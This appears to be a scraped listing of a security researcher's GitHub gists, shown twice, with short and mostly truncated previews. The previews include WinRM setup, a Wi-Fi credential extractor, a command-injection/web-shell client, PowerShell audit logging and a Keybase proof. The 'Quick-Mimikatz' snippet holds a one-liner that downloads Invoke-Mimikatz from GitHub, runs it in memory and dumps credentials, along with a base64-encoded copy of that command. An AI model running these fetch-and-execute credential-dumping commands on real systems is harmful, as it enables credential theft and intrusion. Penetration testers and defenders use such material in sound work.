Greg Foss gfoss

## Enable-PSRemoting.ps1
function enablePSRemoting {
    Enable-PSRemoting –force
    Set-Service WinRM -StartMode Automatic
    Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}
    Set-Item WSMan:localhost\client\trustedhosts -value *
    Get-Item WSMan:\localhost\Client\TrustedHosts
}

## auto-hydra.sh
#!/bin/bash
#
# @heinzarelli
# greg . foss [at] logrhythm . com
# v0.1 - May 2017
#


function usage {
    echo ""

## Extract-WiFi-Creds.ps1

  #====================================#
  # Extract Wi-Fi Credentials          #
  # greg . foss @ owasp . org          #
  # v0.1  --  July, 2017               #
  #====================================#

# Licensed under the MIT License

<#

## say.ps1
function say {
    param( [string]$comment = $_ )
    [Reflection.Assembly]::LoadWithPartialName('System.Speech') | Out-Null
    $object = New-Object System.Speech.Synthesis.SpeechSynthesizer
    $object.SelectVoiceByHints('Female')
    $object.Speak("$comment")
}

## Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*

#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;

#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQ

## PowerShell Command Line Logging
# PowerShell Audit Logging for LogRhythm SIEM - 2015
# For detecting dangerous PowerShell Commands/Functions

Log Source Type:
  MS Event Log for Win7/Win8/2008/2012 - PowerShell

Add this file to your PowerShell directory to enable verbose command line audit logging
profile.ps1
	$LogCommandHealthEvent = $true
	$LogCommandLifeCycleEvent = $true

## gist:70ae3df90c5a532baaf7
### Keybase proof

I hereby claim:

  * I am gfoss on github.
  * I am heinzarelli (https://keybase.io/heinzarelli) on keybase.
  * I have a public key whose fingerprint is 3DC9 DCF4 C0A3 7206 C45B  66FB C2DE DD96 D935 5D0E

To claim this, I am signing this object:

## command injector
#!/bin/bash
#
# Command Injector v0.1
# greg.foss[at]owasp.org
# modified version of dirtshell by 'superkojiman' to exploit command injection vulnerabilities / access web shells via cli
# dirtshell.sh => http://blog.techorganic.com/2012/06/lets-kick-shell-ish-part-1-directory.html

function usage {
    echo "usage: -u URL"
    echo "eg   : -u \"http://site.com/index.php?cmd=\""

## autopeep.sh
#!/bin/bash
#
# Utilizing LaNMaSteR53's peepingtom.py script to auto-scrape web servers and send out notifications.
# Optimized for Kali Linux
# greg.foss[at]owasp.org
#
# cronjob to run this script once a week every Sunday at Midnight
# 0 0 * * 0 /usr/share/peepingtom/autopeep.sh

# prepare storage location, remove old data, and migrate existing folders

## nmap-os-detection
$ sudo nmap -F -O [IP-RANGE] | grep "scan report\|Running: " > os.txt; echo "$(cat os.txt | grep Apple | wc -l) OS X devices"; echo "$(cat os.txt | grep Linux | wc -l) Linux devices"; echo "$(cat os.txt | grep Windows | wc -l) Windows devices"
	function enablePSRemoting {
	Enable-PSRemoting –force
	Set-Service WinRM -StartMode Automatic
	Get-WmiObject -Class win32_service \| Where-Object {$_.name -like "WinRM"}
	Set-Item WSMan:localhost\client\trustedhosts -value *
	Get-Item WSMan:\localhost\Client\TrustedHosts
	}
	#!/bin/bash
	#
	# @heinzarelli
	# greg . foss [at] logrhythm . com
	# v0.1 - May 2017
	#


	function usage {
	echo ""

	#====================================#
	# Extract Wi-Fi Credentials #
	# greg . foss @ owasp . org #
	# v0.1 -- July, 2017 #
	#====================================#

	# Licensed under the MIT License

	<#
	function say {
	param( [string]$comment = $_ )
	[Reflection.Assembly]::LoadWithPartialName('System.Speech') \| Out-Null
	$object = New-Object System.Speech.Synthesis.SpeechSynthesizer
	$object.SelectVoiceByHints('Female')
	$object.Speak("$comment")
	}
	NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!

	#mimikatz [local]
	IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;

	#encoded-mimikatz [local]
	powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQ
	# PowerShell Audit Logging for LogRhythm SIEM - 2015
	# For detecting dangerous PowerShell Commands/Functions

	Log Source Type:
	MS Event Log for Win7/Win8/2008/2012 - PowerShell

	Add this file to your PowerShell directory to enable verbose command line audit logging
	profile.ps1
	$LogCommandHealthEvent = $true
	$LogCommandLifeCycleEvent = $true
	### Keybase proof

	I hereby claim:

	* I am gfoss on github.
	* I am heinzarelli (https://keybase.io/heinzarelli) on keybase.
	* I have a public key whose fingerprint is 3DC9 DCF4 C0A3 7206 C45B 66FB C2DE DD96 D935 5D0E

	To claim this, I am signing this object:
	#!/bin/bash
	#
	# Command Injector v0.1
	# greg.foss[at]owasp.org
	# modified version of dirtshell by 'superkojiman' to exploit command injection vulnerabilities / access web shells via cli
	# dirtshell.sh => http://blog.techorganic.com/2012/06/lets-kick-shell-ish-part-1-directory.html

	function usage {
	echo "usage: -u URL"
	echo "eg : -u \"http://site.com/index.php?cmd=\""
	#!/bin/bash
	#
	# Utilizing LaNMaSteR53's peepingtom.py script to auto-scrape web servers and send out notifications.
	# Optimized for Kali Linux
	# greg.foss[at]owasp.org
	#
	# cronjob to run this script once a week every Sunday at Midnight
	# 0 0 * * 0 /usr/share/peepingtom/autopeep.sh

	# prepare storage location, remove old data, and migrate existing folders